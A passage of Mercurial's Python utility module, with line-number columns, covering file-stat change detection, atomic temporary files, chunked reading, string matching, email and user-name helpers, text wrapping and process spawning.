1892 1895 return temp
1893 1896 if not getattr(inst, 'filename', None):
1894 1897 inst.filename = name
1895 1898 raise
1896 1899 ofp = posixfile(temp, "wb")
1897 1900 for chunk in filechunkiter(ifp):
1898 1901 ofp.write(chunk)
1899 1902 ifp.close()
1900 1903 ofp.close()
1901 1904 except: # re-raises
1902 1905 try:
1903 1906 os.unlink(temp)
1904 1907 except OSError:
1905 1908 pass
1906 1909 raise
1907 1910 return temp
1908 1911
1909 1912 class filestat(object):
1910 1913 """help to exactly detect change of a file
1911 1914
1912 1915 'stat' attribute is result of 'os.stat()' if specified 'path'
1913 1916 exists. Otherwise, it is None. This can avoid preparative
1914 1917 'exists()' examination on client side of this class.
1915 1918 """
1916 1919 def __init__(self, stat):
1917 1920 self.stat = stat
1918 1921
1919 1922 @classmethod
1920 1923 def frompath(cls, path):
1921 1924 try:
1922 1925 stat = os.stat(path)
1923 1926 except OSError as err:
1924 1927 if err.errno != errno.ENOENT:
1925 1928 raise
1926 1929 stat = None
1927 1930 return cls(stat)
1928 1931
1929 1932 @classmethod
1930 1933 def fromfp(cls, fp):
1931 1934 stat = os.fstat(fp.fileno())
1932 1935 return cls(stat)
1933 1936
1934 1937 __hash__ = object.__hash__
1935 1938
1936 1939 def __eq__(self, old):
1937 1940 try:
1938 1941 # if ambiguity between stat of new and old file is
1939 1942 # avoided, comparison of size, ctime and mtime is enough
1940 1943 # to exactly detect change of a file regardless of platform
1941 1944 return (self.stat.st_size == old.stat.st_size and
1942 1945 self.stat.st_ctime == old.stat.st_ctime and
1943 1946 self.stat.st_mtime == old.stat.st_mtime)
1944 1947 except AttributeError:
1945 1948 pass
1946 1949 try:
1947 1950 return self.stat is None and old.stat is None
1948 1951 except AttributeError:
1949 1952 return False
1950 1953
1951 1954 def isambig(self, old):
1952 1955 """Examine whether new (= self) stat is ambiguous against old one
1953 1956
1954 1957 "S[N]" below means stat of a file at N-th change:
1955 1958
1956 1959 - S[n-1].ctime < S[n].ctime: can detect change of a file
1957 1960 - S[n-1].ctime == S[n].ctime
1958 1961 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1959 1962 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1960 1963 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1961 1964 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1962 1965
1963 1966 Case (*2) above means that a file was changed twice or more at
1964 1967 same time in sec (= S[n-1].ctime), and comparison of timestamp
1965 1968 is ambiguous.
1966 1969
1967 1970 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1968 1971 timestamp is ambiguous".
1969 1972
1970 1973 But advancing mtime only in case (*2) doesn't work as
1971 1974 expected, because naturally advanced S[n].mtime in case (*1)
1972 1975 might be equal to manually advanced S[n-1 or earlier].mtime.
1973 1976
1974 1977 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1975 1978 treated as ambiguous regardless of mtime, to avoid overlooking
1976 1979 by confliction between such mtime.
1977 1980
1978 1981 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1979 1982 S[n].mtime", even if size of a file isn't changed.
1980 1983 """
1981 1984 try:
1982 1985 return (self.stat.st_ctime == old.stat.st_ctime)
1983 1986 except AttributeError:
1984 1987 return False
1985 1988
1986 1989 def avoidambig(self, path, old):
1987 1990 """Change file stat of specified path to avoid ambiguity
1988 1991
1989 1992 'old' should be previous filestat of 'path'.
1990 1993
1991 1994 This skips avoiding ambiguity, if a process doesn't have
1992 1995 appropriate privileges for 'path'. This returns False in this
1993 1996 case.
1994 1997
1995 1998 Otherwise, this returns True, as "ambiguity is avoided".
1996 1999 """
1997 2000 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1998 2001 try:
1999 2002 os.utime(path, (advanced, advanced))
2000 2003 except OSError as inst:
2001 2004 if inst.errno == errno.EPERM:
2002 2005 # utime() on the file created by another user causes EPERM,
2003 2006 # if a process doesn't have appropriate privileges
2004 2007 return False
2005 2008 raise
2006 2009 return True
2007 2010
2008 2011 def __ne__(self, other):
2009 2012 return not self == other
2010 2013
2011 2014 class atomictempfile(object):
2012 2015 '''writable file object that atomically updates a file
2013 2016
2014 2017 All writes will go to a temporary copy of the original file. Call
2015 2018 close() when you are done writing, and atomictempfile will rename
2016 2019 the temporary copy to the original name, making the changes
2017 2020 visible. If the object is destroyed without being closed, all your
2018 2021 writes are discarded.
2019 2022
2020 2023 checkambig argument of constructor is used with filestat, and is
2021 2024 useful only if target file is guarded by any lock (e.g. repo.lock
2022 2025 or repo.wlock).
2023 2026 '''
2024 2027 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2025 2028 self.__name = name # permanent name
2026 2029 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2027 2030 createmode=createmode)
2028 2031 self._fp = posixfile(self._tempname, mode)
2029 2032 self._checkambig = checkambig
2030 2033
2031 2034 # delegated methods
2032 2035 self.read = self._fp.read
2033 2036 self.write = self._fp.write
2034 2037 self.seek = self._fp.seek
2035 2038 self.tell = self._fp.tell
2036 2039 self.fileno = self._fp.fileno
2037 2040
2038 2041 def close(self):
2039 2042 if not self._fp.closed:
2040 2043 self._fp.close()
2041 2044 filename = localpath(self.__name)
2042 2045 oldstat = self._checkambig and filestat.frompath(filename)
2043 2046 if oldstat and oldstat.stat:
2044 2047 rename(self._tempname, filename)
2045 2048 newstat = filestat.frompath(filename)
2046 2049 if newstat.isambig(oldstat):
2047 2050 # stat of changed file is ambiguous to original one
2048 2051 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
2049 2052 os.utime(filename, (advanced, advanced))
2050 2053 else:
2051 2054 rename(self._tempname, filename)
2052 2055
2053 2056 def discard(self):
2054 2057 if not self._fp.closed:
2055 2058 try:
2056 2059 os.unlink(self._tempname)
2057 2060 except OSError:
2058 2061 pass
2059 2062 self._fp.close()
2060 2063
2061 2064 def __del__(self):
2062 2065 if safehasattr(self, '_fp'): # constructor actually did something
2063 2066 self.discard()
2064 2067
2065 2068 def __enter__(self):
2066 2069 return self
2067 2070
2068 2071 def __exit__(self, exctype, excvalue, traceback):
2069 2072 if exctype is not None:
2070 2073 self.discard()
2071 2074 else:
2072 2075 self.close()
2073 2076
2074 2077 def unlinkpath(f, ignoremissing=False):
2075 2078 """unlink and remove the directory if it is empty"""
2076 2079 if ignoremissing:
2077 2080 tryunlink(f)
2078 2081 else:
2079 2082 unlink(f)
2080 2083 # try removing directories that might now be empty
2081 2084 try:
2082 2085 removedirs(os.path.dirname(f))
2083 2086 except OSError:
2084 2087 pass
2085 2088
2086 2089 def tryunlink(f):
2087 2090 """Attempt to remove a file, ignoring ENOENT errors."""
2088 2091 try:
2089 2092 unlink(f)
2090 2093 except OSError as e:
2091 2094 if e.errno != errno.ENOENT:
2092 2095 raise
2093 2096
2094 2097 def makedirs(name, mode=None, notindexed=False):
2095 2098 """recursive directory creation with parent mode inheritance
2096 2099
2097 2100 Newly created directories are marked as "not to be indexed by
2098 2101 the content indexing service", if ``notindexed`` is specified
2099 2102 for "write" mode access.
2100 2103 """
2101 2104 try:
2102 2105 makedir(name, notindexed)
2103 2106 except OSError as err:
2104 2107 if err.errno == errno.EEXIST:
2105 2108 return
2106 2109 if err.errno != errno.ENOENT or not name:
2107 2110 raise
2108 2111 parent = os.path.dirname(os.path.abspath(name))
2109 2112 if parent == name:
2110 2113 raise
2111 2114 makedirs(parent, mode, notindexed)
2112 2115 try:
2113 2116 makedir(name, notindexed)
2114 2117 except OSError as err:
2115 2118 # Catch EEXIST to handle races
2116 2119 if err.errno == errno.EEXIST:
2117 2120 return
2118 2121 raise
2119 2122 if mode is not None:
2120 2123 os.chmod(name, mode)
2121 2124
2122 2125 def readfile(path):
2123 2126 with open(path, 'rb') as fp:
2124 2127 return fp.read()
2125 2128
2126 2129 def writefile(path, text):
2127 2130 with open(path, 'wb') as fp:
2128 2131 fp.write(text)
2129 2132
2130 2133 def appendfile(path, text):
2131 2134 with open(path, 'ab') as fp:
2132 2135 fp.write(text)
2133 2136
2134 2137 class chunkbuffer(object):
2135 2138 """Allow arbitrary sized chunks of data to be efficiently read from an
2136 2139 iterator over chunks of arbitrary size."""
2137 2140
2138 2141 def __init__(self, in_iter):
2139 2142 """in_iter is the iterator that's iterating over the input chunks."""
2140 2143 def splitbig(chunks):
2141 2144 for chunk in chunks:
2142 2145 if len(chunk) > 2**20:
2143 2146 pos = 0
2144 2147 while pos < len(chunk):
2145 2148 end = pos + 2 ** 18
2146 2149 yield chunk[pos:end]
2147 2150 pos = end
2148 2151 else:
2149 2152 yield chunk
2150 2153 self.iter = splitbig(in_iter)
2151 2154 self._queue = collections.deque()
2152 2155 self._chunkoffset = 0
2153 2156
2154 2157 def read(self, l=None):
2155 2158 """Read L bytes of data from the iterator of chunks of data.
2156 2159 Returns less than L bytes if the iterator runs dry.
2157 2160
2158 2161 If size parameter is omitted, read everything"""
2159 2162 if l is None:
2160 2163 return ''.join(self.iter)
2161 2164
2162 2165 left = l
2163 2166 buf = []
2164 2167 queue = self._queue
2165 2168 while left > 0:
2166 2169 # refill the queue
2167 2170 if not queue:
2168 2171 target = 2**18
2169 2172 for chunk in self.iter:
2170 2173 queue.append(chunk)
2171 2174 target -= len(chunk)
2172 2175 if target <= 0:
2173 2176 break
2174 2177 if not queue:
2175 2178 break
2176 2179
2177 2180 # The easy way to do this would be to queue.popleft(), modify the
2178 2181 # chunk (if necessary), then queue.appendleft(). However, for cases
2179 2182 # where we read partial chunk content, this incurs 2 dequeue
2180 2183 # mutations and creates a new str for the remaining chunk in the
2181 2184 # queue. Our code below avoids this overhead.
2182 2185
2183 2186 chunk = queue[0]
2184 2187 chunkl = len(chunk)
2185 2188 offset = self._chunkoffset
2186 2189
2187 2190 # Use full chunk.
2188 2191 if offset == 0 and left >= chunkl:
2189 2192 left -= chunkl
2190 2193 queue.popleft()
2191 2194 buf.append(chunk)
2192 2195 # self._chunkoffset remains at 0.
2193 2196 continue
2194 2197
2195 2198 chunkremaining = chunkl - offset
2196 2199
2197 2200 # Use all of unconsumed part of chunk.
2198 2201 if left >= chunkremaining:
2199 2202 left -= chunkremaining
2200 2203 queue.popleft()
2201 2204 # offset == 0 is enabled by block above, so this won't merely
2202 2205 # copy via ``chunk[0:]``.
2203 2206 buf.append(chunk[offset:])
2204 2207 self._chunkoffset = 0
2205 2208
2206 2209 # Partial chunk needed.
2207 2210 else:
2208 2211 buf.append(chunk[offset:offset + left])
2209 2212 self._chunkoffset += left
2210 2213 left -= chunkremaining
2211 2214
2212 2215 return ''.join(buf)
2213 2216
2214 2217 def filechunkiter(f, size=131072, limit=None):
2215 2218 """Create a generator that produces the data in the file size
2216 2219 (default 131072) bytes at a time, up to optional limit (default is
2217 2220 to read all data). Chunks may be less than size bytes if the
2218 2221 chunk is the last chunk in the file, or the file is a socket or
2219 2222 some other type of file that sometimes reads less data than is
2220 2223 requested."""
2221 2224 assert size >= 0
2222 2225 assert limit is None or limit >= 0
2223 2226 while True:
2224 2227 if limit is None:
2225 2228 nbytes = size
2226 2229 else:
2227 2230 nbytes = min(limit, size)
2228 2231 s = nbytes and f.read(nbytes)
2229 2232 if not s:
2230 2233 break
2231 2234 if limit:
2232 2235 limit -= len(s)
2233 2236 yield s
2234 2237
2235 2238 class cappedreader(object):
2236 2239 """A file object proxy that allows reading up to N bytes.
2237 2240
2238 2241 Given a source file object, instances of this type allow reading up to
2239 2242 N bytes from that source file object. Attempts to read past the allowed
2240 2243 limit are treated as EOF.
2241 2244
2242 2245 It is assumed that I/O is not performed on the original file object
2243 2246 in addition to I/O that is performed by this instance. If there is,
2244 2247 state tracking will get out of sync and unexpected results will ensue.
2245 2248 """
2246 2249 def __init__(self, fh, limit):
2247 2250 """Allow reading up to <limit> bytes from <fh>."""
2248 2251 self._fh = fh
2249 2252 self._left = limit
2250 2253
2251 2254 def read(self, n=-1):
2252 2255 if not self._left:
2253 2256 return b''
2254 2257
2255 2258 if n < 0:
2256 2259 n = self._left
2257 2260
2258 2261 data = self._fh.read(min(n, self._left))
2259 2262 self._left -= len(data)
2260 2263 assert self._left >= 0
2261 2264
2262 2265 return data
2263 2266
2264 2267 def stringmatcher(pattern, casesensitive=True):
2265 2268 """
2266 2269 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2267 2270 returns the matcher name, pattern, and matcher function.
2268 2271 missing or unknown prefixes are treated as literal matches.
2269 2272
2270 2273 helper for tests:
2271 2274 >>> def test(pattern, *tests):
2272 2275 ... kind, pattern, matcher = stringmatcher(pattern)
2273 2276 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2274 2277 >>> def itest(pattern, *tests):
2275 2278 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2276 2279 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2277 2280
2278 2281 exact matching (no prefix):
2279 2282 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2280 2283 ('literal', 'abcdefg', [False, False, True])
2281 2284
2282 2285 regex matching ('re:' prefix)
2283 2286 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2284 2287 ('re', 'a.+b', [False, False, True])
2285 2288
2286 2289 force exact matches ('literal:' prefix)
2287 2290 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2288 2291 ('literal', 're:foobar', [False, True])
2289 2292
2290 2293 unknown prefixes are ignored and treated as literals
2291 2294 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2292 2295 ('literal', 'foo:bar', [False, False, True])
2293 2296
2294 2297 case insensitive regex matches
2295 2298 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2296 2299 ('re', 'A.+b', [False, False, True])
2297 2300
2298 2301 case insensitive literal matches
2299 2302 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2300 2303 ('literal', 'ABCDEFG', [False, False, True])
2301 2304 """
2302 2305 if pattern.startswith('re:'):
2303 2306 pattern = pattern[3:]
2304 2307 try:
2305 2308 flags = 0
2306 2309 if not casesensitive:
2307 2310 flags = remod.I
2308 2311 regex = remod.compile(pattern, flags)
2309 2312 except remod.error as e:
2310 2313 raise error.ParseError(_('invalid regular expression: %s')
2311 2314 % e)
2312 2315 return 're', pattern, regex.search
2313 2316 elif pattern.startswith('literal:'):
2314 2317 pattern = pattern[8:]
2315 2318
2316 2319 match = pattern.__eq__
2317 2320
2318 2321 if not casesensitive:
2319 2322 ipat = encoding.lower(pattern)
2320 2323 match = lambda s: ipat == encoding.lower(s)
2321 2324 return 'literal', pattern, match
2322 2325
2323 2326 def shortuser(user):
2324 2327 """Return a short representation of a user name or email address."""
2325 2328 f = user.find('@')
2326 2329 if f >= 0:
2327 2330 user = user[:f]
2328 2331 f = user.find('<')
2329 2332 if f >= 0:
2330 2333 user = user[f + 1:]
2331 2334 f = user.find(' ')
2332 2335 if f >= 0:
2333 2336 user = user[:f]
2334 2337 f = user.find('.')
2335 2338 if f >= 0:
2336 2339 user = user[:f]
2337 2340 return user
2338 2341
2339 2342 def emailuser(user):
2340 2343 """Return the user portion of an email address."""
2341 2344 f = user.find('@')
2342 2345 if f >= 0:
2343 2346 user = user[:f]
2344 2347 f = user.find('<')
2345 2348 if f >= 0:
2346 2349 user = user[f + 1:]
2347 2350 return user
2348 2351
2349 2352 def email(author):
2350 2353 '''get email of author.'''
2351 2354 r = author.find('>')
2352 2355 if r == -1:
2353 2356 r = None
2354 2357 return author[author.find('<') + 1:r]
2355 2358
2356 2359 def ellipsis(text, maxlength=400):
2357 2360 """Trim string to at most maxlength (default: 400) columns in display."""
2358 2361 return encoding.trim(text, maxlength, ellipsis='...')
2359 2362
2360 2363 def unitcountfn(*unittable):
2361 2364 '''return a function that renders a readable count of some quantity'''
2362 2365
2363 2366 def go(count):
2364 2367 for multiplier, divisor, format in unittable:
2365 2368 if abs(count) >= divisor * multiplier:
2366 2369 return format % (count / float(divisor))
2367 2370 return unittable[-1][2] % count
2368 2371
2369 2372 return go
2370 2373
2371 2374 def processlinerange(fromline, toline):
2372 2375 """Check that linerange <fromline>:<toline> makes sense and return a
2373 2376 0-based range.
2374 2377
2375 2378 >>> processlinerange(10, 20)
2376 2379 (9, 20)
2377 2380 >>> processlinerange(2, 1)
2378 2381 Traceback (most recent call last):
2379 2382 ...
2380 2383 ParseError: line range must be positive
2381 2384 >>> processlinerange(0, 5)
2382 2385 Traceback (most recent call last):
2383 2386 ...
2384 2387 ParseError: fromline must be strictly positive
2385 2388 """
2386 2389 if toline - fromline < 0:
2387 2390 raise error.ParseError(_("line range must be positive"))
2388 2391 if fromline < 1:
2389 2392 raise error.ParseError(_("fromline must be strictly positive"))
2390 2393 return fromline - 1, toline
2391 2394
2392 2395 bytecount = unitcountfn(
2393 2396 (100, 1 << 30, _('%.0f GB')),
2394 2397 (10, 1 << 30, _('%.1f GB')),
2395 2398 (1, 1 << 30, _('%.2f GB')),
2396 2399 (100, 1 << 20, _('%.0f MB')),
2397 2400 (10, 1 << 20, _('%.1f MB')),
2398 2401 (1, 1 << 20, _('%.2f MB')),
2399 2402 (100, 1 << 10, _('%.0f KB')),
2400 2403 (10, 1 << 10, _('%.1f KB')),
2401 2404 (1, 1 << 10, _('%.2f KB')),
2402 2405 (1, 1, _('%.0f bytes')),
2403 2406 )
2404 2407
2405 2408 # Matches a single EOL which can either be a CRLF where repeated CR
2406 2409 # are removed or a LF. We do not care about old Macintosh files, so a
2407 2410 # stray CR is an error.
2408 2411 _eolre = remod.compile(br'\r*\n')
2409 2412
2410 2413 def tolf(s):
2411 2414 return _eolre.sub('\n', s)
2412 2415
2413 2416 def tocrlf(s):
2414 2417 return _eolre.sub('\r\n', s)
2415 2418
2416 2419 if pycompat.oslinesep == '\r\n':
2417 2420 tonativeeol = tocrlf
2418 2421 fromnativeeol = tolf
2419 2422 else:
2420 2423 tonativeeol = pycompat.identity
2421 2424 fromnativeeol = pycompat.identity
2422 2425
2423 2426 def escapestr(s):
2424 2427 # call underlying function of s.encode('string_escape') directly for
2425 2428 # Python 3 compatibility
2426 2429 return codecs.escape_encode(s)[0]
2427 2430
2428 2431 def unescapestr(s):
2429 2432 return codecs.escape_decode(s)[0]
2430 2433
2431 2434 def forcebytestr(obj):
2432 2435 """Portably format an arbitrary object (e.g. exception) into a byte
2433 2436 string."""
2434 2437 try:
2435 2438 return pycompat.bytestr(obj)
2436 2439 except UnicodeEncodeError:
2437 2440 # non-ascii string, may be lossy
2438 2441 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2439 2442
2440 2443 def uirepr(s):
2441 2444 # Avoid double backslash in Windows path repr()
2442 2445 return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\')
2443 2446
2444 2447 # delay import of textwrap
2445 2448 def MBTextWrapper(**kwargs):
2446 2449 class tw(textwrap.TextWrapper):
2447 2450 """
2448 2451 Extend TextWrapper for width-awareness.
2449 2452
2450 2453 Neither number of 'bytes' in any encoding nor 'characters' is
2451 2454 appropriate to calculate terminal columns for specified string.
2452 2455
2453 2456 Original TextWrapper implementation uses built-in 'len()' directly,
2454 2457 so overriding is needed to use width information of each characters.
2455 2458
2456 2459 In addition, characters classified into 'ambiguous' width are
2457 2460 treated as wide in East Asian area, but as narrow in other.
2458 2461
2459 2462 This requires use decision to determine width of such characters.
2460 2463 """
2461 2464 def _cutdown(self, ucstr, space_left):
2462 2465 l = 0
2463 2466 colwidth = encoding.ucolwidth
2464 2467 for i in xrange(len(ucstr)):
2465 2468 l += colwidth(ucstr[i])
2466 2469 if space_left < l:
2467 2470 return (ucstr[:i], ucstr[i:])
2468 2471 return ucstr, ''
2469 2472
2470 2473 # overriding of base class
2471 2474 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2472 2475 space_left = max(width - cur_len, 1)
2473 2476
2474 2477 if self.break_long_words:
2475 2478 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2476 2479 cur_line.append(cut)
2477 2480 reversed_chunks[-1] = res
2478 2481 elif not cur_line:
2479 2482 cur_line.append(reversed_chunks.pop())
2480 2483
2481 2484 # this overriding code is imported from TextWrapper of Python 2.6
2482 2485 # to calculate columns of string by 'encoding.ucolwidth()'
2483 2486 def _wrap_chunks(self, chunks):
2484 2487 colwidth = encoding.ucolwidth
2485 2488
2486 2489 lines = []
2487 2490 if self.width <= 0:
2488 2491 raise ValueError("invalid width %r (must be > 0)" % self.width)
2489 2492
2490 2493 # Arrange in reverse order so items can be efficiently popped
2491 2494 # from a stack of chucks.
2492 2495 chunks.reverse()
2493 2496
2494 2497 while chunks:
2495 2498
2496 2499 # Start the list of chunks that will make up the current line.
2497 2500 # cur_len is just the length of all the chunks in cur_line.
2498 2501 cur_line = []
2499 2502 cur_len = 0
2500 2503
2501 2504 # Figure out which static string will prefix this line.
2502 2505 if lines:
2503 2506 indent = self.subsequent_indent
2504 2507 else:
2505 2508 indent = self.initial_indent
2506 2509
2507 2510 # Maximum width for this line.
2508 2511 width = self.width - len(indent)
2509 2512
2510 2513 # First chunk on line is whitespace -- drop it, unless this
2511 2514 # is the very beginning of the text (i.e. no lines started yet).
2512 2515 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2513 2516 del chunks[-1]
2514 2517
2515 2518 while chunks:
2516 2519 l = colwidth(chunks[-1])
2517 2520
2518 2521 # Can at least squeeze this chunk onto the current line.
2519 2522 if cur_len + l <= width:
2520 2523 cur_line.append(chunks.pop())
2521 2524 cur_len += l
2522 2525
2523 2526 # Nope, this line is full.
2524 2527 else:
2525 2528 break
2526 2529
2527 2530 # The current line is full, and the next chunk is too big to
2528 2531 # fit on *any* line (not just this one).
2529 2532 if chunks and colwidth(chunks[-1]) > width:
2530 2533 self._handle_long_word(chunks, cur_line, cur_len, width)
2531 2534
2532 2535 # If the last chunk on this line is all whitespace, drop it.
2533 2536 if (self.drop_whitespace and
2534 2537 cur_line and cur_line[-1].strip() == r''):
2535 2538 del cur_line[-1]
2536 2539
2537 2540 # Convert current line back to a string and store it in list
2538 2541 # of all lines (return value).
2539 2542 if cur_line:
2540 2543 lines.append(indent + r''.join(cur_line))
2541 2544
2542 2545 return lines
2543 2546
2544 2547 global MBTextWrapper
2545 2548 MBTextWrapper = tw
2546 2549 return tw(**kwargs)
2547 2550
2548 2551 def wrap(line, width, initindent='', hangindent=''):
2549 2552 maxindent = max(len(hangindent), len(initindent))
2550 2553 if width <= maxindent:
2551 2554 # adjust for weird terminal size
2552 2555 width = max(78, maxindent + 1)
2553 2556 line = line.decode(pycompat.sysstr(encoding.encoding),
2554 2557 pycompat.sysstr(encoding.encodingmode))
2555 2558 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2556 2559 pycompat.sysstr(encoding.encodingmode))
2557 2560 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2558 2561 pycompat.sysstr(encoding.encodingmode))
2559 2562 wrapper = MBTextWrapper(width=width,
2560 2563 initial_indent=initindent,
2561 2564 subsequent_indent=hangindent)
2562 2565 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2563 2566
2564 2567 if (pyplatform.python_implementation() == 'CPython' and
2565 2568 sys.version_info < (3, 0)):
2566 2569 # There is an issue in CPython that some IO methods do not handle EINTR
2567 2570 # correctly. The following table shows what CPython version (and functions)
2568 2571 # are affected (buggy: has the EINTR bug, okay: otherwise):
2569 2572 #
2570 2573 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2571 2574 # --------------------------------------------------
2572 2575 # fp.__iter__ | buggy | buggy | okay
2573 2576 # fp.read* | buggy | okay [1] | okay
2574 2577 #
2575 2578 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2576 2579 #
2577 2580 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2578 2581 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2579 2582 #
2580 2583 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2581 2584 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2582 2585 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2583 2586 # fp.__iter__ but not other fp.read* methods.
2584 2587 #
2585 2588 # On modern systems like Linux, the "read" syscall cannot be interrupted
2586 2589 # when reading "fast" files like on-disk files. So the EINTR issue only
2587 2590 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2588 2591 # files approximately as "fast" files and use the fast (unsafe) code path,
2589 2592 # to minimize the performance impact.
2590 2593 if sys.version_info >= (2, 7, 4):
2591 2594 # fp.readline deals with EINTR correctly, use it as a workaround.
2592 2595 def _safeiterfile(fp):
2593 2596 return iter(fp.readline, '')
2594 2597 else:
2595 2598 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2596 2599 # note: this may block longer than necessary because of bufsize.
2597 2600 def _safeiterfile(fp, bufsize=4096):
2598 2601 fd = fp.fileno()
2599 2602 line = ''
2600 2603 while True:
2601 2604 try:
2602 2605 buf = os.read(fd, bufsize)
2603 2606 except OSError as ex:
2604 2607 # os.read only raises EINTR before any data is read
2605 2608 if ex.errno == errno.EINTR:
2606 2609 continue
2607 2610 else:
2608 2611 raise
2609 2612 line += buf
2610 2613 if '\n' in buf:
2611 2614 splitted = line.splitlines(True)
2612 2615 line = ''
2613 2616 for l in splitted:
2614 2617 if l[-1] == '\n':
2615 2618 yield l
2616 2619 else:
2617 2620 line = l
2618 2621 if not buf:
2619 2622 break
2620 2623 if line:
2621 2624 yield line
2622 2625
2623 2626 def iterfile(fp):
2624 2627 fastpath = True
2625 2628 if type(fp) is file:
2626 2629 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2627 2630 if fastpath:
2628 2631 return fp
2629 2632 else:
2630 2633 return _safeiterfile(fp)
2631 2634 else:
2632 2635 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2633 2636 def iterfile(fp):
2634 2637 return fp
2635 2638
2636 2639 def iterlines(iterator):
2637 2640 for chunk in iterator:
2638 2641 for line in chunk.splitlines():
2639 2642 yield line
2640 2643
2641 2644 def expandpath(path):
2642 2645 return os.path.expanduser(os.path.expandvars(path))
2643 2646
2644 2647 def hgcmd():
2645 2648 """Return the command used to execute current hg
2646 2649
2647 2650 This is different from hgexecutable() because on Windows we want
2648 2651 to avoid things opening new shell windows like batch files, so we
2649 2652 get either the python call or current executable.
2650 2653 """
2651 2654 if mainfrozen():
2652 2655 if getattr(sys, 'frozen', None) == 'macosx_app':
2653 2656 # Env variable set by py2app
2654 2657 return [encoding.environ['EXECUTABLEPATH']]
2655 2658 else:
2656 2659 return [pycompat.sysexecutable]
2657 2660 return gethgcmd()
2658 2661
2659 2662 def rundetached(args, condfn):
2660 2663 """Execute the argument list in a detached process.
2661 2664
2662 2665 condfn is a callable which is called repeatedly and should return
2663 2666 True once the child process is known to have started successfully.
2664 2667 At this point, the child process PID is returned. If the child
2665 2668 process fails to start or finishes before condfn() evaluates to
2666 2669 True, return -1.
2667 2670 """
2668 2671 # Windows case is easier because the child process is either
2669 2672 # successfully starting and validating the condition or exiting
2670 2673 # on failure. We just poll on its PID. On Unix, if the child
2671 2674 # process fails to start, it will be left in a zombie state until
2672 2675 # the parent wait on it, which we cannot do since we expect a long
2673 2676 # running process on success. Instead we listen for SIGCHLD telling
2674 2677 # us our child process terminated.
2675 2678 terminated = set()
2676 2679 def handler(signum, frame):
2677 2680 terminated.add(os.wait())
2678 2681 prevhandler = None
2679 2682 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2680 2683 if SIGCHLD is not None:
2681 2684 prevhandler = signal.signal(SIGCHLD, handler)
2682 2685 try:
2683 2686 pid = spawndetached(args)
2684 2687 while not condfn():
2685 2688 if ((pid in terminated or not testpid(pid))
2686 2689 and not condfn()):
2687 2690 return -1
2688 2691 time.sleep(0.1)
2689 2692 return pid
2690 2693 finally:
2691 2694 if prevhandler is not None:
2692 2695 signal.signal(signal.SIGCHLD, prevhandler)
2693 2696
2694 2697 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2695 2698 """Return the result of interpolating items in the mapping into string s.
2696 2699
2697 2700 prefix is a single character string, or a two character string with
2698 2701 a backslash as the first character if the prefix needs to be escaped in
2699 2702 a regular expression.
2700 2703
2701 2704 fn is an optional function that will be applied to the replacement text
2702 2705 just before replacement.
2703 2706
2704 2707 escape_prefix is an optional flag that allows using doubled prefix for
2705 2708 its escaping.
2706 2709 """
2707 2710 fn = fn or (lambda s: s)
2708 2711 patterns = '|'.join(mapping.keys())
2709 2712 if escape_prefix:
2710 2713 patterns += '|' + prefix
2711 2714 if len(prefix) > 1:
2712 2715 prefix_char = prefix[1:]
2713 2716 else:
2714 2717 prefix_char = prefix
2715 2718 mapping[prefix_char] = prefix_char
2716 2719 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2717 2720 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2718 2721
2719 2722 def getport(port):
2720 2723 """Return the port for a given network service.
2721 2724
2722 2725 If port is an integer, it's returned as is. If it's a string, it's
2723 2726 looked up using socket.getservbyname(). If there's no matching
2724 2727 service, error.Abort is raised.
2725 2728 """
2726 2729 try:
2727 2730 return int(port)
2728 2731 except ValueError:
2729 2732 pass
2730 2733
2731 2734 try:
2732 2735 return socket.getservbyname(pycompat.sysstr(port))
2733 2736 except socket.error:
2734 2737 raise Abort(_("no port number associated with service '%s'") % port)
2735 2738
2736 2739 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2737 2740 '0': False, 'no': False, 'false': False, 'off': False,
2738 2741 'never': False}
2739 2742
2740 2743 def parsebool(s):
2741 2744 """Parse s into a boolean.
2742 2745
2743 2746 If s is not a valid boolean, returns None.
2744 2747 """
